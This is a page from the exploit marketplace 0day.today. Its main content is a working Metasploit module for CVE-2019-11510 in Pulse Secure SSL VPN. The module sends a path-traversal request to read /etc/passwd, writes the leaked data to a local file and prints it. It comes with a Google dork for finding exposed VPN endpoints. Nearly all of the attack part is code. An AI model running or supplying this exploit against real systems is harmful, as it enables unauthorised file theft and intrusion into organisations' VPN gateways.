0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) # Google Dork: inurl:/dana-na/ filetype:cgi # Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: Linux # CVE : CVE-2019-11510 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Post::File def initialize(info = {}) super(update_info(info, 'Name' => 'Pulse Secure - System file leak', 'Description' => %q{ Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. This exploit reads /etc/passwd as a proof of concept This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 }, 'References' => [ [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] ], 'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, )) end def run() print_good("Checking target...") res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) if res && res.code == 200 print_good("Target is Vulnerable!") data = res.body current_host = datastore['RHOST'] filename = "msf_sslwebsession_"+current_host+".bin" File.delete(filename) if File.exist?(filename) file_local_write(filename, data) print_good("Parsing file.......") parse() else if(res && res.code == 404) print_error("Target not Vulnerable") else print_error("Ooof, try again...") end end end def parse() current_host = datastore['RHOST'] fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") words = 0 while (line = fileObj.gets) printable_data = line.gsub(/[^[:print:]]/, '.') array_data = printable_data.scan(/.{1,60}/m) for ar in array_data if ar != "............................................................" print_good(ar) end end #print_good(printable_data) end fileObj.close end end # 0day.today [2024-06-21] #